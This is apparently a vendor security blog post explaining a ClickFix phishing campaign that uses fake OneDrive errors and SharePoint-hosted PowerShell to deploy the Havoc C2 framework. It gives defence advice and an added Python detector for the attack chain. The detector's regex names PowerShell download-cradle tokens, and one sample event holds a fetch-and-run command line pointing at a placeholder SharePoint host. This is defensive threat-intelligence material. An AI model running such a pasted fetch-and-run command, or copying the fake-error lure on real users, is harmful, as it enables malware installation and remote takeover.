ClickFix Attack Deploys Havoc C2 via Microsoft SharePoint

Justine Garrett
Product Marketing Manager

A newly discovered ClickFix phishing campaign is being used by cybercriminals to trick victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access. This attack leverages Microsoft SharePoint and Graph API to disguise malicious activity within trusted cloud services, making it difficult for security teams to detect the breach.

ClickFix, a social engineering tactic, creates fake error messages that prompt users to copy and paste a PowerShell command to fix a nonexistent issue. Instead, this command executes malware that grants attackers control over compromised systems, enabling them to steal data, move laterally, and deploy additional payloads.

Inside the ClickFix Attack: How It Works

Step 1: Phishing Email & Fake Error Message

Victims receive an HTML phishing email attachment labeled "Documents.html". When opened, the attachment displays a fake 0x8004de86 error, claiming that OneDrive failed to connect and requires a manual fix. A "How to Fix" button instructs users to copy a PowerShell command and execute it in their terminal.

Step 2: Execution of Malicious PowerShell Script

The PowerShell command downloads and runs a script hosted on a compromised Microsoft SharePoint site. The script first checks whether the device is a sandboxed analysis environment, so that security tools never see the later stages. If no sandbox is detected, the script:

  • Modifies the Windows Registry to mark execution.
  • Installs Python (if not already present).
  • Fetches and runs another Python script from SharePoint.

Step 3: Deployment of Havoc C2 Framework

The Python script loads KaynLdr, a reflective DLL loader that launches Havoc Demon, a post-exploitation agent similar to Cobalt Strike. Havoc establishes remote control over the infected device, allowing threat actors to:

  • Execute commands and payloads.
  • Manipulate authentication tokens.
  • Perform Kerberos attacks for credential theft.
  • Exfiltrate sensitive data.

Step 4: Concealing Malicious Traffic via Microsoft Graph API

Attackers use the Microsoft Graph API to route Havoc C2 communication through legitimate Microsoft services. This technique makes it harder to detect malicious activity, as traffic appears to originate from trusted cloud applications rather than external servers.

The Growing Threat of ClickFix Attacks

ClickFix has quickly become a popular social engineering technique among cybercriminals, evolving beyond traditional email phishing. Recent developments include:

  • Wider malware distribution: ClickFix is now used to deploy infostealers, DarkGate, and remote access trojans (RATs).
  • Exploitation of social media: Threat actors have launched Telegram-based ClickFix scams using a fake identity verification service called "Safeguard" to trick users into running malicious PowerShell commands.

This evolution in phishing tactics highlights the increasing sophistication of cybercriminals, who are using trusted cloud platforms and social engineering to infiltrate corporate networks.

How to Protect Against ClickFix & Havoc C2 Attacks

  • Employee Awareness & Phishing Prevention: Educate employees about ClickFix scams, warn against copying & pasting commands from unknown sources, and enable email security solutions to block phishing emails containing malicious HTML attachments.
  • Endpoint Security & Threat Detection: Deploy AI-powered endpoint protection to detect and block suspicious PowerShell executions, monitor for unauthorized registry modifications, and use sandboxing tools to analyze potentially malicious scripts.
  • Secure Cloud & Microsoft Services: Restrict PowerShell execution policies to prevent unauthorized scripts from running, audit Microsoft SharePoint & Graph API usage to detect abnormal activity, and use Zero Trust security principles to limit access to cloud services with multi-factor authentication (MFA).
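As an added example (not code from the original post or from the campaign's tooling), the following Python scores constructed process-creation events for the Step 2 and Step 3 chain that the detection bullet above asks teams to monitor: an interactively launched PowerShell download cradle pointing at a SharePoint host, followed by a Python child process. The event field names, the threshold and the placeholder tenant name are assumptions of this example.

```python
"""Flag the ClickFix chain from Steps 2 and 3 in constructed process-creation
events: user-launched PowerShell that pulls a script from a SharePoint URL and
runs it, then spawns Python. Field names mimic Sysmon Event ID 1 (assumption)."""
import re
from typing import Dict, List

# Tokens typical of PowerShell "download and run in memory" one-liners.
CRADLE = re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
TRUSTED = (".sharepoint.com", "graph.microsoft.com")  # the page's point: looks like Microsoft traffic

def score_powershell(cmdline: str, parent: str) -> Dict[str, int]:
    """Named indicators for one PowerShell launch; their sum is its risk score."""
    hits: Dict[str, int] = {}
    if CRADLE.search(cmdline):
        hits["download_cradle"] = 2
    if any(h.lower().endswith(TRUSTED) for h in URL_HOST.findall(cmdline)):
        hits["trusted_cloud_host"] = 1
    if parent.lower().endswith("\\explorer.exe"):
        hits["interactive_launch"] = 1  # pasted by a user, not run by a scheduled job
    return hits

def detect_clickfix(events: List[dict], threshold: int = 3) -> List[dict]:
    """One alert per PowerShell process whose indicator sum reaches the threshold."""
    ps: Dict[int, Dict[str, int]] = {}
    for ev in events:  # pass 1: score every PowerShell launch
        if ev["Image"].lower().endswith("\\powershell.exe"):
            ps[ev["ProcessId"]] = score_powershell(ev["CommandLine"], ev["ParentImage"])
    for ev in events:  # pass 2: Python interpreter spawned by a scored PowerShell
        if ev["ParentProcessId"] in ps and ev["Image"].lower().endswith("\\python.exe"):
            ps[ev["ParentProcessId"]]["python_child"] = 1
    return [{"pid": pid, "score": sum(h.values()), "indicators": sorted(h)}
            for pid, h in ps.items() if sum(h.values()) >= threshold]

def sample_events() -> List[dict]:
    """Constructed events; the SharePoint tenant and paths are placeholders, not real IoCs."""
    ps_exe = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"ProcessId": 4120, "ParentProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe",
         "Image": ps_exe,
         "CommandLine": 'powershell -c "iex (iwr https://TENANT-PLACEHOLDER.sharepoint.com/fix.ps1)"'},
        {"ProcessId": 4188, "ParentProcessId": 4120, "ParentImage": ps_exe,
         "Image": r"C:\Users\user\AppData\Local\Programs\Python\python.exe",
         "CommandLine": "python.exe stage2.py"},
        # Benign control: scheduled maintenance script started by the task scheduler.
        {"ProcessId": 5000, "ParentProcessId": 900, "ParentImage": r"C:\Windows\System32\svchost.exe",
         "Image": ps_exe, "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1"},
    ]
```

Scoring the launch context rather than the execution policy matters here because an execution policy is not a security boundary and does not stop a pasted one-liner.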

Final Thoughts: The Rising Danger of Social Engineering Attacks

The ClickFix phishing campaign demonstrates how attackers weaponize trust: they lean on Microsoft cloud services, PowerShell, and social engineering to execute highly effective cyberattacks. By disguising malware distribution within legitimate cloud infrastructure, they make it significantly harder for traditional security measures to detect and block these threats.

As ClickFix continues to evolve and spread across different attack vectors, organizations must prioritize phishing awareness, endpoint security, and cloud security monitoring to defend against these emerging threats.

Protect Your Business with Nexanet

Cybercriminals are exploiting cloud services and social engineering to bypass security controls. Nexanet provides advanced email security, endpoint protection, and threat intelligence solutions to help businesses detect and block sophisticated phishing attacks.
